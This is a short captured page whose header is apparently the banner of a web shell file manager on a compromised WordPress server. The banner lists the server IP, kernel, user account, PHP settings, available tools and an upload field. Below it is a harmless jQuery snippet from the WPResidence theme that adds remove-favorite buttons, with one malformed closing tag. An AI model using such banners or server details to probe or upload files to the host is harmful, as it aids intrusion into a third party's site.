| Server IP : 198.38.94.67 / Your IP : 216.73.217.74 Web Server : LiteSpeed System : Linux d6054.dxb1.stableserver.net 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64 User : azfilmst ( 1070) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/azfilmst/royalopus.ae/wp-content/themes/wpresidence/js/ |
Upload File : |
/*
*
* Add remove favorites button for card in front end favorite list
*
*/
function wpestate_enable_front_end_remove_favorites(){
jQuery('.wpestate_latest_listings_sh .listing_wrapper').each(function(event){
var property_card=jQuery(this);
var property_id = jQuery(this).attr('data-listid');
var to_append='<div class="remove_fav_dash wpresidence_button " data-postid="'+property_id+'">1'+wpestate_favorite_remove_vars.remove_from_favorites+'/div>';
property_card.prepend(to_append);
});
}